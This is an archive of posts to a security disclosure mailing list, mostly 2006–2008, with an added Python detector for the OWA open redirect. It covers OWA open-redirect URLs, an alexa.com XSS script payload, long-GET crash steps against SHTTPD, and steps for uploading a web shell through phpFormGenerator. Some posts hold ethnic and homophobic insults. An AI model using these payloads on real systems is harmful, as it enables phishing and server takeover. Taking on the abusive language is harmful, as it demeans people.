Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br]

2008-10-18 Thread Morning Wood
Discovered and reported 3 years ago

http://www.google.com/search?hl=enq=oaw+exploit+exploitlabs.com+

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-001-owa.txt

http://seclists.org/fulldisclosure/2005/Feb/0101.html

http://forums.techarena.in/small-business-server/1006421.htm

 Microsoft Outlook Web Access owalogon.asp Redirection Weakness



http://secunia.com/advisories/14144/

- Original Message - 
From: Davide Del Vecchio [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; 
[EMAIL PROTECTED]
Sent: Friday, October 17, 2008 12:07 PM
Subject: Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - 
[MSRC7368br]


 Hi,

 I found this vulnerability and reported it to Microsoft on:

 Tue, 10 Apr 2007 15:40:13 +0200

 You read that correctly: April 2007, 1 year and 6 months ago. :(

 The Microsoft Security Response Center opened the case ID MSRC 7368br.

 The bug has not been patched in 1 year and 6 months.
 I asked from time to time for updates, but they always answered that the
 bug had to be patched with the next Service Pack and that they did not have
 any ETA.

 This SP has still to be released.

 They told me that if I released the vulnerability prior to the official
 patch, I could not be officially credited for that. I thought it was not
 a critical vuln, and so I waited. Too much (?).

 I am a bit sorry for Microsoft, I think they lost another chance since
 now I feel a bit tricked. I am not sure if the next time I will wait so
 much and I am not sure if I will suggest to anyone to wait for the
 patch. I just hope Microsoft will credit me in the official patch. :(

 Below you can find the first mail I wrote to MS regarding the issue.

 Best regards,

 Davide Del Vecchio.


 From: Davide Del Vecchio [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]

 Subject: Microsoft Outlook Web Access redir.asp Redirection Weakness
 Date: Tue, 10 Apr 2007 15:40:13 +0200

 Hello,

 I found a weakness in Microsoft Outlook Web Access (OWA), which
 potentially can be exploited by malicious people to conduct phishing
 attacks.
 The weakness is caused due to a design error in the way OWA uses an
 unverified user supplied argument to redirect a user after successful
 authentication.
 This can e.g. be exploited by tricking a user into following a link from
 a HTML document to the trusted login page with a malicious url 
 parameter.
 After successful authentication, the user will be redirected to the
 untrusted (fake) site.

 The affected product is:
 Microsoft Outlook Web Access ( OWA )
 Windows 2003

 Examples:
 https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com

 this will take the user to http://www.example.com when the login box
 is pressed.

 https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe
 prompts the user to download an executable or other file.

 The attacker can then have a page to capture the user / password
 and redirect back to the original login page or some other form of
 phishing attack.

 Note that this vulnerability is very similar to the one affecting
 owalogin.asp described here:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0420

 Best regards,

 Davide Del Vecchio.

 Martin Suess ha scritto:

 ...

 Timeline:
 -
 Vendor Status:  MSRC tracking case closed
 Vendor Notified:March 31st 2008
 Vendor Response:May 6th 2008
 Advisory Release:   October 15th 2008
 Patch available:- (vulnerability not high priority)


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
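
The advisory quoted in this message says OWA redirects to an unverified, user-supplied `URL` argument. As an added example (not part of the original posts and not Microsoft's code), the Python below classifies a redirect target the way a server-side check could, and uses the same check to flag off-site `redir.asp` requests in web server logs. The host name `mail.example.org`, the log field layout, the sample log lines and the function names are assumptions made for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Path and parameter name as given in the advisory; both are matched
# case-insensitively here.
REDIR_PATH = "/exchweb/bin/redir.asp"
REDIR_PARAM = "url"


def classify_target(target, trusted_hosts):
    """Return 'local', 'trusted' or 'external' for a redirect target."""
    # Browsers treat backslashes as slashes in http(s) URLs and skip extra
    # leading slashes, so "/\host" and "///host" both leave the site.
    cleaned = target.strip().replace("\\", "/")
    if cleaned.startswith("//"):
        cleaned = "//" + cleaned.lstrip("/")
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return "external"          # unparseable input is never trusted
    if not parts.scheme and not parts.netloc:
        return "local"             # plain path such as /exchange/
    if parts.scheme and parts.scheme not in ("http", "https"):
        return "external"          # javascript:, data:, ...
    # .hostname drops any "user@" prefix, so "trusted@other-host" is
    # judged by the host the browser would really contact.
    host = (parts.hostname or "").lower()
    return "trusted" if host in trusted_hosts else "external"


def find_offsite_redirects(log_text, trusted_hosts):
    """Return (client_ip, target) for redir.asp hits that leave the site.

    Expects W3C extended log text whose column order is declared by a
    '#Fields:' line.
    """
    fields = []
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != REDIR_PATH:
            continue
        # parse_qs percent-decodes, so encoded targets are seen in clear.
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for name, values in query.items():
            if name.lower() != REDIR_PARAM:
                continue
            for value in values:
                if classify_target(value, trusted_hosts) == "external":
                    hits.append((row.get("c-ip"), value))
    return hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-10-17 09:01:12 192.0.2.10 GET /exchweb/bin/redir.asp URL=http://www.example.com 200
2008-10-17 09:01:40 192.0.2.11 GET /exchweb/bin/redir.asp URL=https://mail.example.org/exchange/ 200
2008-10-17 09:02:03 192.0.2.12 GET /exchweb/bin/redir.asp url=%2F%2Fwww.example.com%2Fsetup.exe 200
2008-10-17 09:02:30 192.0.2.13 GET /exchange/ - 200
2008-10-17 09:03:00 192.0.2.14 GET /exchweb/bin/redir.asp URL=/exchange/inbox 200
"""

TRUSTED_HOSTS = {"mail.example.org"}  # assumed OWA host name

if __name__ == "__main__":
    for client, target in find_offsite_redirects(SAMPLE_LOG, TRUSTED_HOSTS):
        print(client, target)
```

A server-side fix would apply the same classification before issuing the redirect and fall back to a fixed local page for anything classified as external.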


Re: [Full-disclosure] Cross site scripting issues in s9y(CVE-2008-1386, CVE-2008-1387)

2008-04-22 Thread Morning Wood
SHUT THE FUCK UP!

From: n3td3v [EMAIL PROTECTED]





Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Morning Wood
4. use xss to IFRAME or otherwise leverage a client exploit

imho this is by far worse than any of the other vectors mentioned



Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread Morning Wood
im so hurt now... you make me feel so small compared to your great worx 
MrReepass
stfu kthnx


- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Wednesday, December 12, 2007 9:01 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 wow thats quite impressive.. you couldnt exploit a basic overflow and two
 years later someone else did

 you must be quite proud. Did you tell your family and co workers about 
 this
 great finding? I hear tipping point and idefense are hiring you should
 forward them this set of emails.

 On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:

 One of my first advisories and was rediscovered later, turned into a
 viable
 exploit 2 years after by another researcher.


 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user


 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

 *hugz*


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Tuesday, December 11, 2007 1:58 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
 Bufferoverflow
 Vulnerability


  are you serious?
 
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
 
  I guess you are a 'brain dead india wannabe sec researcher' also?
 
 
  On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  advisories like this are typical of brain dead India wannabe sec
  researchers
  nuff said
 


Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread Morning Wood
basically i am saying i could care less, it was years ago, and i certainly 
do not care about your gay antics at security cons or on this or any other 
public forum...

can you really not be any better than a worthless pile of gmail poop? or at 
least let everyone see your great security worx... but i seriously doubt that 
will happen * kinda like n3td3v's great security research / discoveries!

ciao

- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Thursday, December 13, 2007 10:43 AM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 so are you now admitting your vulnerability was worthless?

 On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote:

 im so hurt now... you make me feel so small compared to your great worx
 MrReepass
 stfu kthnx


 - Original Message -
 From: reepex [EMAIL PROTECTED]
 To: Morning Wood [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Wednesday, December 12, 2007 9:01 PM
 Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
 Bufferoverflow
 Vulnerability


  wow thats quite impressive.. you couldnt exploit a basic overflow and
 two
  years later someone else did
 
  you must be quite proud. Did you tell your family and co workers about
  this
  great finding? I hear tipping point and idefense are hiring you should
  forward them this set of emails.
 
  On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote:
 
  One of my first advisories and was rediscovered later, turned into a
  viable
  exploit 2 years after by another researcher.
 
 
 
 http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user
 
 
 
 http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77
 
  *hugz*
 
 
  - Original Message -
  From: reepex [EMAIL PROTECTED]
  To: Morning Wood [EMAIL PROTECTED];
  full-disclosure@lists.grok.org.uk
  Sent: Tuesday, December 11, 2007 1:58 PM
  Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple
  Bufferoverflow
  Vulnerability
 
 
   are you serious?
  
  
 
 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html
  
   I guess you are a 'brain dead india wannabe sec researcher' also?
  
  
   On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] 
   wrote:
  
   advisories like this are typical of brain dead India wannabe sec
   researchers
   nuff said
  


Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-12 Thread Morning Wood
One of my first advisories and was rediscovered later, turned into a viable 
exploit 2 years after by another researcher.

http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user

http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77

*hugz*


- Original Message - 
From: reepex [EMAIL PROTECTED]
To: Morning Wood [EMAIL PROTECTED]; 
full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 11, 2007 1:58 PM
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow 
Vulnerability


 are you serious?

 http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html

 I guess you are a 'brain dead india wannabe sec researcher' also?


 On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote:

 advisories like this are typical of brain dead India wannabe sec
 researchers
 nuff said



Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-11 Thread Morning Wood
advisories like this are typical of brain dead India wannabe sec researchers
nuff said



Re: [Full-disclosure] RIPA powers being used

2007-11-21 Thread Morning Wood
- Original Message - 
From: James Rankin [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Tuesday, November 20, 2007 3:46 AM
Subject: [Full-disclosure] RIPA powers being used


 RIPA is finally being used to force people to hand over encryption keys...

 http://news.bbc.co.uk/1/hi/technology/7102180.stm

omg wtf...

In the event that there was doubt that a suspect did not possess a key, he 
said, it was up to the prosecution to demonstrate beyond a reasonable doubt 
that they could know the passphrase



ever fat finger a password? ever forgot a password? ( I got a zip archive I 
protected and can't unlock due to the fact I forgot the passphrase )

looks like prosecutors and judges will now be ASSUMING guilt or innocence 
based on what they THINK MIGHT be true. ( if you created the passphrase you 
must know it )



Re: [Full-disclosure] IDS logs showing outgoing packets on port 80

2007-11-04 Thread Morning Wood
Skype?

- Original Message - 
From: Kelly Robinson [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Saturday, November 03, 2007 3:20 PM
Subject: [Full-disclosure] IDS logs showing outgoing packets on port 80


 In our IDS logs, I notice many outgoing packets coming from port 80 
 (HTTP).
 These packets are coming from client PCs. What may be happening?








Re: [Full-disclosure] MySpace URL redirection

2007-10-27 Thread Morning Wood
 warning: will crash Internet Exploder.

 http://profile.myspace.com/index.cfm?fuseaction=cms.goto_i=176efaa7-1908-488e-aa3e-2565dcf843d6_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html

redirection yes, crash no ( IE7 ) crash yes ( IE6 )



Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest

2007-10-16 Thread Morning Wood
 Do you understand the concept of protecting people and corporations from
 total idiots trying to gain access to their systems?PDP just lets others
 know what he found,while the offending company is working on a fix,in a
 minimal way.
 
 If you were a true researcher,you should be able to find the same with
 the clues he provides.Yay for PDP not feeding script kiddies!
 

dunno but every sec researcher I know in the private sector would never
release any info without it being fully authorized by his / her employer.

Possibly we will see these idiots looking for a new job soon?



Re: [Full-disclosure] are the NetBIOS-like hacking days over? -wide open citrix services on critical domains

2007-10-08 Thread Morning Wood
Netbios is quite fun over Hamachi

Subject: Re: [Full-disclosure] are the NetBIOS-like hacking days over?



Re: [Full-disclosure] Testing DidTheyReadIt.com

2007-09-29 Thread Morning Wood
Outlook Express blocks this by default, unless you click
the show images dialog thingie



Re: [Full-disclosure] Symantec Contact?

2007-09-18 Thread Morning Wood
 What's really Sad is that Symantec does not have an option for the
 general public (i.e. Independent Virus Researchers) to submit virus
 samples .
 
 You have to either
 A. Submit it through their product.
 B. Have a Corporate Support contract.
 
 Guess they don't want new samples.

agree 100%, stupidity



Re: [Full-disclosure] intrusion kit

2007-08-06 Thread Morning Wood
What I'm looking for is an intrusion kit, a ZIP file that contains
 common tools like: vnc, nmap, pwdump, ssh client, etc. That have all
 dependencies in the zip file, so I could do:

 unzip kit.zip
 cd nmap
 nmap -sS localhost
 cd ..
 cd vnc
 run-vnc-server


i guess you're so talented in breaking into boxen that you can't simply
make your own SFX to do what you want.

btw: i seriously doubt anyone will help you ( or you buy the ebay offered 
one LOL...
 have fun getting yourself pwnt )

byez,
MW 



Re: [Full-disclosure] Turkish hackers bring down insurer's site

2007-07-19 Thread Morning Wood
 http://www.smh.com.au/news/web/turkish-hackers-bring-down-insurers-site/2007/07/20/118455284.html

it's a defacement, so what? Done by Turkish skriptkidz, with kidiescriptz no 
less ( you can bet the farm there was no data or customer information 
leaked... )

move along... ( nothing to see here ) 



Re: [Full-disclosure] Persistent XSS and CSRF and on networkappliance

2007-06-27 Thread Morning Wood
 For the love of god people can we stop with the hashing already?

hmm... i like hash ( and cake )
can we have a Month of Hash Cakes?



Re: [Full-disclosure] You shady bastards.

2007-06-08 Thread Morning Wood
 yeah, lets reply the more we can!!!

I like cake.



Re: [Full-disclosure] Yahoo 0day ActiveX Webcam Exploit

2007-06-07 Thread Morning Wood
cannot reproduce..

yahoo IM versions
6.0.0.1922
8.1.0.249

 DCE2F8B1-A520-11D4-8FD0-00D0B7730277
ywcupl.dll
versions 2.0.1.2 and 2.0.1.4


9D39223E-AE8E-11D4-8FD3-00D0B7730277
ywcvwr.dll
versions 2.0.1.3 and 2.0.1.4



Re: [Full-disclosure] 0day Yahoo Webcam Exploits

2007-06-07 Thread Morning Wood
 Corrected and working:
   
  I am very sorry! Please check again
   
  Exploit #1
   

new versions:
9D39223E-AE8E-11D4-8FD3-00D0B7730277
success yahoo version 8.1.0.249

  Exploit #2:

no success ( black box in IE )


1 for 2 come on danny!!!



Re: [Full-disclosure] 0day Yahoo Webcam Exploits

2007-06-07 Thread Morning Wood
   
  Exploit #2:

working now..



Re: [Full-disclosure] alexa.com XSS

2007-05-29 Thread Morning Wood
 http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

 is there more to say?

Thank you, The thumbnail image for scriptalert(alexa sucks)/script 
will be updated within 48 hours 



Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies

2007-05-20 Thread Morning Wood
 A crack commando lead by Gandhi (who showed up in
 boxing gloves and elastic pants) managed to destroy an Iranian
 building complex used to conduct Denial of Service attacks against
 str0ke's private IRC intelligence service.

 But how did he destroy the building is the real question?

 /str0ke

 Gandhi has been known to be secretly developing a bot intra transformation 
chromatifier, or
BITCh, for short. This appears to actually harness the power of teh bots DoS 
functions, via a
fiber optic link to power a wave disruptor, being co developed by MI6. 
Digging further,
reports are that an engineer by the aforementioned code name v3dt3n has 
been a major
player in this.  This is all the info I can find for now...

hope it helps,
M.Wood 



Re: [Full-disclosure] Spam is funny!

2007-04-30 Thread Morning Wood

 Anyone else seeing this trend? I'd be curious especially to see whether
 or not they're targeting folks in non-IT roles. For example, do we
 have any veterinarians on the list who get stock spam with subjects
 related to animal husbandry?

yup, lots of odd topics, in particular they do appear to come from mailman
lists where you have subscribed, I get spam subjects and body content from
what appears to be recently discussed topics, although only security
lists. ( and yes, universally they are penny stock dump spam )

mw 



Re: [Full-disclosure] Why Microsoft should make windows open source

2007-04-04 Thread Morning Wood

 M$ will never let us h4x0rz into their source (willingly) but I agree
 with you James, the open source paradigm has regularly outpaced M$ and
 many other large corporate software producers where it comes to
 addressing bugs, security holes, and in many cases feature requests.

 Who knows... maybe they will get smart. IMHO M$ should, and could,
release an opensource OS.

 OpenWin , WindOS, call it whatever.
 Release a small basic win32 platform ( kernel / window / desktop / 
explorer ), that could
leverage existing development tools, to allow the community to provide 
extensible
applications that readily conform to existing, public API's. Provided with 
runtime
libraries already available in today's applications, the underpinning would 
support
existing win32 applications.

 Packaged with win32 / cygwin versions of POSIX tools, perl, php and python, 
it
would be a very robust, basic OS.

( reactOS + freeDOS ? )

 Ooops... I forgot... this is Micro$oft I was talking about

..what we need is another Linus Torvalds to build and release a newcode 
win32 compliant
kernel / base that uses

anyway,
M.W







Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Morning Wood
 Fuck you too.
 
 Larry Seltzer
 eWEEK.com Security Center Editor

cool  Ziff-Davis lets you curse online.



Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability

2007-03-30 Thread Morning Wood

 If you discover a vulnerability in CA products, please report
 your findings to vuln at ca dot com, or utilize our Submit a
 Vulnerability form at
 http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.

Looks like a vuln is found once a week in C.A products
esp in your Backup and Anti-Viri products.

3 are listed currently on your own page
http://www3.ca.com/securityadvisor/vulninfo/

and um...
http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmcpst=computer%20associates;


tired of seeing C.A. exploits!!!
especially the corporate products,

 your clients must thank you for providing remote access in EVERY PROGRAM 
YOU RELEASE
( i know the blackhats do )
please delete these products from your catalog.
m.w




Re: [Full-disclosure] Xbox live account stolen.

2007-03-26 Thread Morning Wood
 Here is my current update on the situation.

 http://www.digitalmunition.com/StolenUpdate.html

 It would seem to me that MS / Bungie could simply cross reference
the pretexted accounts to the IP address logged in from, following the 
reporting
of a compromised account. If it is a rather small group perpetrating this, 
and
it appears to be, one would think investigators could track this fairly 
easily???

 XBOX Live accounts are purchased, and have monetary value.
 I am sure once word got out that these pretexters were being arrested for 
theft, incidents
would drop fairly rapidly...  PH34R T3H XB0X P0L1C3 !!!

my $0.02,
m.w 



[Full-disclosure] shttpd long get request vuln ( retro )

2006-10-18 Thread Morning Wood

see attached retro advisory

  - EXPL-A-2006-005 exploitlabs.com Retro Advisory 002 -

 - SHTTPD -


AFFECTED PRODUCTS
=================
SHTTPD  v1.34
http://shttpd.sourceforge.net/


OVERVIEW
========
SHTTPD is a lightweight web server. The main design
goals are the ease of use  and the ability to embed.
Ideal for personal use, web-based software demos 
(like PHP, Perl etc), quick file sharing.

A care has been taken to make the code secure


RETRO-RELEASE DATE:
===================
Oct 10, 2005

Duplicate Release: Oct 06, 2006 
by: sk0de

http://secunia.com/advisories/22294/


DETAILS
=======
SHTTPD is vulnerable to an overly long GET request.


SOLUTION
========
patch: Upgrade to v1.35


PROOF OF CONCEPT
================
1.start SHTTPD

2.send an overly long GET request

http://[host]/Ax274 chars ( v1.27 - v1.30 )
http://[host]/Ax256 chars ( v1.34 )
v1.31-v1.33 untested

2a.
PoC by Sk0de
http://www.milw0rm.com/exploits/2482


CREDITS
=======
sk0de - http://secunia.com/advisories/22294/ 


RETRO-CREDITS
=============
This vulnerability was discovered and researched by 
Donnie Werner of Exploitlabs. At the original time
of discovery and retro-release date, the author was
not aware of any other advisories or research by 3rd parties.


Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web:http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txt

Re: [Full-disclosure] Googling:Google Meta Bugs

2006-10-12 Thread Morning Wood
well... there is always this for fun... if you feel the need
 to...

http://www.google.com/search?hl=enlr=safe=offq=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80

dosvidanya,
mw 



Re: [Full-disclosure] non-tech: defcon and FD. :)

2006-08-26 Thread Morning Wood
So, at defcon, one of the evenings, at one of the tables... several 
people

sat. Some of them were decent and therefore shall remain nameless. When
introductions were made, we realized that

The others were:
Morning_Wood, the bantown fa*ot spammer, and me.

We have a picture together, morning, how about uploading it somewhere?


http://exploitlabs.com/gadi-scares-me.jpg



Morning_Wood was surprisingly a cool guy, as well... but I think he is a
bit scared of me now that we met. :P


what me scared???. LOL, you're like a TEDDY BEAR!



n3td3v spunked:
Morning Wood's mother has just died, I don't think this is the time to 
poke

fun... I could be wrong though ;)


at least I had one that loved life until her unexpected and untimely death, 
unlike your mum that drinks and turns tricks for the construction blokes 
down the lane for a hit off the crack pipe... eh mate? now shove off wanker!


mw




Re: [Full-disclosure] Yahoo messenger serious bug

2006-07-29 Thread Morning Wood
I have a private PoC for this now for a few months, it does work ( although 
the PoC is slightly different and only requires one msg string to be sent ).


cheers,
MW 




[Full-disclosure] Debian Development Machine Gluck Hacked - UPDATE

2006-07-13 Thread Morning Wood



Debian Development Machine Hacked
http://lists.debian.org/debian-devel-announce/2006/07/msg3.html
or
http://www.zone-h.org/content/view/13853/31/


Confirmed hacked by:
Linux Kernel PRCTL Core Dump Handling Privilege Escalation Vulnerability

http://www.debian.org/News/2006/20060713

or

http://www.zone-h.org/content/view/13853/31/  ( updated )



Re: [Full-disclosure] Debian Development Machine Gluck Hacked -UPDATE

2006-07-13 Thread Morning Wood



David Taylor wrote:
Curious why Secunia is rating this as 'less critical'.  The way I see it,
this exploit could be integrated into the other exploits for mambo, 
joomla,

phpbb, etc.  Also, all of us that have websites hosted on linux machines
that have a vulnerable kernel could get root?

I'm thinking 'highly critical'?


considering the widespread use of that kernel,
yes

and yes, viable user=root exploit can be obtained from a web app vuln. ( 
hacking 101 here kids ) 




[Full-disclosure] Debian Development Machine Gluck Hacked

2006-07-12 Thread Morning Wood

Debian Development Machine Hacked
http://lists.debian.org/debian-devel-announce/2006/07/msg3.html
or
http://www.zone-h.org/content/view/13853/31/



Re: [Full-disclosure] Yahoo IM spoofing

2006-07-11 Thread Morning Wood

Describe the IM a little further.

Receiving garbage in an IM message isn't new, and is commonly sent to
everyone in a chat room via a chat-bot. The IM commonly contains URL
hyperlinks to either a gambling site, or a porn site [webcam,dating,etc].



the person who sends you the IM is YOU





Re: [Full-disclosure] 70 million computers are using Windows 98 rightnow

2006-07-11 Thread Morning Wood
Windows 98 has no remote exploits, only client side attacks ( IE, OE, WMP 
and 3rd party apps )
( try sticking a win98 box in a dmz or direct to the Internet... It won't get 
owned ). I don't think it is that huge of an issue that they are abandoning 
its users.


The impending abandonment of support for Win98 has been coming for at 
least 2 years

http://www.microsoft.com/windows/lifecycle/default.mspx
http://www.internetnews.com/dev-news/article.php/3298741

As a matter of fact I have a Win98 box just for a game ( Descent2 on 3dfx 
!!! ) and my TV tuner.



One suggestion to Microsoft would be to make Win98 ( and Dos 6.2x ) 
available as a freeware OS since they will no longer be burdened by support, 
patches and etc anyway. Replace IE and OE with open source replacements, and 
the platform could be a low cost alternative that would also carry a fair 
degree of security for those that would like to deploy it.


They could even open up some source code that is not used by the currently 
supported OS's, that could bring a good deal of support and development by 
the community.


my2bits,
MW





[Full-disclosure] phpFormGenerator

2006-06-30 Thread Morning Wood

 - EXPL-A-2006-004 exploitlabs.com Advisory 049 -
   - phpFormGenerator -




AFFECTED PRODUCTS
=================
phpFormGenerator  v2.09
http://phpformgen.sourceforge.net/


OVERVIEW
========
phpFormGenerator is an easy-to-use tool to create reliable 
and efficient web forms in a snap. No programming of any 
sort is required. Just follow along the phpFormGenerator 
wizard and at the end, you will have a fully functional web 
form!


note:
as stated by the vendor this script is widely used with cPanel
and other hosting provider solutions.



DETAILS
=======
phpFormGenerator by default installs all directories
as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms'
directory and *everything* inside it 
(including all subdirectories and files)


UNIX:
chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it)
has read+write access. you can achieve this by issuing the following
command on linux/unix:
chmod -R 777 forms


researcher note:
when the applications directories are not set 777 the app errors with:


File and Directory permissions 
The forms directory is not writeable.

The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files
and directories mentioned above. Refresh this page
after you have done so.


SOLUTION
========
vendor contact:
Musawir Ali [EMAIL PROTECTED] June 30, 2006

patch: none ( see vendor response )


VENDOR RESPONSE
===============
there are no security flaws ... if you had taken a moment to think,
you would realize that a major software company such as cPanel would
not be shipping phpFormGenerator with their scripts if it had flaws.
In any case, the program has been thoroughly tested by myself and
other security experts and is not known to have any issues.

777 is never forced, the suggested method is to give write permissions
to the group the process belongs to.
upload function is insecure. arbitrary php functions are insecure...
could you be any more vague? You seem to be one of those ignorant
nuts who shout slogans like windows sucks linux owns your server
is insecure without realizing the garbage spooling out of your mouth.

you're wasting my time.
btw.. just so that you know, i have been on openbsd's development
team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how contributing to the
opensource community and not being a bitch.



PROOF OF CONCEPT
================
1.browse to the default install directory

2.create new form with the file upload function

3.complete the form using Insert data to MySQL database table? = no

4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html

5.upload phpshell type of script

6.if you supplied an email address, the link will be sent to you
  http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php


CREDITS
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs


Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt
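
The state the advisory describes (directories left at 777, with uploaded scripts landing under a form's files directory) can be checked for on a host. This is an added example in Python, not part of the advisory or of phpFormGenerator; audit_tree, suggested_mode and the extension list are assumptions made for the illustration.

```python
"""Audit a web root for world-writable directories and server-side scripts
stored inside them (the state left behind by `chmod -R 777 forms`)."""
import os
import stat
import sys
from typing import List, Tuple

# Assumption: extensions the web server is configured to hand to PHP.
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

Finding = Tuple[str, str]  # (kind, path relative to the audited root)


def audit_tree(root: str) -> List[Finding]:
    """Return sorted findings for every directory under root."""
    findings: List[Finding] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        mode = os.stat(dirpath).st_mode
        if not mode & stat.S_IWOTH:
            continue  # only report directories any local account can write to
        rel_dir = os.path.relpath(dirpath, root)
        findings.append(("world-writable-dir", rel_dir))
        for name in filenames:
            # A script in a writable directory is code the server may execute.
            ext = os.path.splitext(name)[1].lower()
            if ext in SCRIPT_EXTS:
                findings.append(
                    ("script-in-writable-dir", os.path.join(rel_dir, name)))
    return sorted(findings)


def suggested_mode(mode: int) -> int:
    """Drop the 'other' write bit and add group write, following the vendor's
    stated alternative of giving write access to the server's group."""
    return (stat.S_IMODE(mode) & ~stat.S_IWOTH) | stat.S_IWGRP


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for kind, path in audit_tree(target):
        print(f"{kind}\t{path}")
```

Group write alone does not address the upload path in the proof of concept; any script-in-writable-dir finding under an upload directory means the server should be configured not to execute files from that location.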



Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Most sites have vulnerabilities

2006-06-24 Thread Morning Wood
 What I am worried about for the moment is milw0rm. That site releases an
 average of 6 or 7 zero day exploits a day.  It has increased the workload I
 have letting our IT folks know about new threats. A lot of these
 vulnerabilities are web/php based but pwn3d is pwn3d.


